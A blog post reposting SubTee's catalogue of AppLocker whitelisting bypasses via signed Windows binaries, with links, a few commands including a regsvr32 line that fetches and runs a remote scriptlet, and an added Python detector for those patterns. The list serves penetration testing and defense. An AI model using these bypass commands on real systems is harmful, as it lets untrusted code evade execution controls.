Various methods for bypassing application whitelisting
SubTee, the master of finding ways to bypass application whitelisting (for example, execution control with AppLocker), has compiled a summary of the various bypass methods on GitHub; go and follow it there. I can say that every one of these methods is excellent. Learn them both for penetration testing and for defense.
Source: SubTee GitHub
# The List #
#
# As many organizations adopt a Whitelisting Strategy, this list seeks to compile known bypass techniques that can be used
# by the security community.
#
# There are many various ways to WhiteList Applications
# Future release will attempt to catalog what works against specific techniques.
#
# Version .0.0.3

1. IEExec
   This technique may work in certain environments. It relies on the fact that many organizations trust executables signed by Microsoft. We can misuse this trust by launching a specially crafted .NET application.
   Example Here: http://www.room362.com/blog/2014/01/16/application-whitelist-bypass-using-ieexec-dot-exe/

2. Rundll32.exe

3. ClickOnce Applications
   dfsvc.exe
   dfshim.dll

4. XBAP - XML Browser Applications
   WPF PresentationHost.exe

5. MD5 Hash Collision
   http://www.mathstat.dal.ca/~selinger/md5collision/

6. PowerShell
   Specifically Reflective Execution
   http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/
   https://www.defcon.org/images/defcon-21/dc-21-presentations/Bialek/DEFCON-21-Bialek-PowerPwning-Post-Exploiting-by-Overpowering-Powershell.pdf

7. .HTA Application
   Invoke PowerShell Scripts
   Launched by mshta.exe, bypasses IE security settings as well.

8. bat, vbs, ps1
   1. cmd.exe /k < script.txt
   2. cscript.exe //E:vbscript script.txt
   3. Get-Content script.txt | iex

9. Malicious Troubleshooting packs - MSDT.exe
   Reference: http://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
   Thanks to @nberthaume, @Killswitch_GUI

10. InstallUtil.exe
    A signed MS binary that loads assemblies and executes - One of the best.
    Examples here: https://gist.github.com/subTee

11. Regsvcs/Regasm
    See: https://gist.github.com/subTee/fb09ef511e592e6f7993
    These 2 are Excellent.

12. regsvr32.exe
    https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302
    This one is just simply amazing...
    regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll

13. Msbuild.exe
    http://subt0x10.blogspot.com/2016/09/bypassing-application-whitelisting.html
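For the defensive side of the list above, here is an added example (not part of SubTee's list or the original post) that scans process-creation records for the signed Microsoft binaries and the command-line shapes catalogued in items 8 and 12. The record layout, the field names (ProcessId, Image, CommandLine) and the sample events are constructed for illustration and assume a Sysmon-style Event ID 1 export.

```python
import re
from typing import Dict, List, Tuple

# Signed Microsoft binaries named in the list. On a locked-down workstation these
# should rarely run outside of software installation or developer activity.
WATCHED_IMAGES = {
    "ieexec.exe", "rundll32.exe", "dfsvc.exe", "presentationhost.exe",
    "mshta.exe", "msdt.exe", "installutil.exe", "regsvcs.exe", "regasm.exe",
    "regsvr32.exe", "msbuild.exe",
}

# Command-line shapes taken from items 8 and 12 of the list.
PATTERNS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("regsvr32 remote scriptlet", re.compile(r"regsvr32.*?/i:https?://.*scrobj\.dll", re.I)),
    ("cmd script via stdin", re.compile(r"cmd\.exe.*?/k\s*<", re.I)),
    ("cscript engine override", re.compile(r"cscript\.exe.*//E:vbscript", re.I)),
    ("Get-Content piped to iex", re.compile(r"Get-Content.*\|\s*iex", re.I)),
]

def classify(record: Dict[str, str]) -> List[str]:
    """Return the name of every watched binary or command-line shape a record matches."""
    hits: List[str] = []
    image = record.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image in WATCHED_IMAGES:
        hits.append(f"whitelist-bypass binary: {image}")
    cmdline = record.get("CommandLine", "")
    hits.extend(name for name, pattern in PATTERNS if pattern.search(cmdline))
    return hits

def scan(records: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (ProcessId, hits) for every record that matched at least one rule."""
    findings = [(r["ProcessId"], classify(r)) for r in records]
    return [(pid, hits) for pid, hits in findings if hits]

# Constructed sample events: the regsvr32 line is the one quoted in item 12, the cmd line
# is item 8.1, and the notepad event is benign noise the rules must not flag.
SAMPLE_EVENTS = [
    {"ProcessId": "1001", "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll"},
    {"ProcessId": "1002", "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "CommandLine": r"InstallUtil.exe C:\Users\Public\app.exe"},
    {"ProcessId": "1003", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
    {"ProcessId": "1004", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /k < script.txt"},
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS):
        print(pid, hits)
```

Image-name matching alone is noisy on build or packaging hosts, so in practice the binary rule is paired with parent-process or user context before it pages anyone.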